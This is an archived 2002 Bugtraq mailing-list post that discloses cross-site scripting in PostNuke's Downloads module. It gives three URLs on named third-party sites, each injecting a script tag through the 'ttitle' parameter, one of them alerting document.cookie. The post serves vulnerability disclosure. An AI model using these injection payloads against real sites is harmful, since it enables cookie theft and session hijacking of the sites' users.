[23717] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

CrossSiteScripting PostNuke.

daemon@ATHENA.MIT.EDU (rolphin)
Mon Jan 7 02:39:45 2002

Date: Sun, 6 Jan 2002 18:38:38 +0100
From: rolphin <rolphin@free.fr>
To: bugtraq@securityfocus.com
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Message-Id: <20020106173338.9DBB11737@relay-1m.club-internet.fr>


http://www.testnuke.com/modules.php?op=modload&name=Downloads&file=index&req=viewdownloaddetails&lid=2&ttitle=%3Cscript%3Ealert(document.location)%3C/script%3E

http://www.nukeaddon.com/modules.php?op=modload&name=Downloads&file=index&req=viewdownloaddetails&lid=1&ttitle=%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www.boomtchak.net/modules.php?op=modload&name=Downloads&file=index&req=viewdownloaddetails&lid=67&ttitle=%3Cscript%3Ealert(document.location)%3C/script%3E


This is in the download module, and these are from postnuke.
I only search for 3 minutes and follow links in the main postnuke page.



I really think you should quit smocking =]
" Air.

-- 
rolphin


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[23717] in bugtraq

CrossSiteScripting PostNuke.

daemon@ATHENA.MIT.EDU (rolphin)Mon Jan 7 02:39:45 2002

daemon@ATHENA.MIT.EDU (rolphin)
Mon Jan 7 02:39:45 2002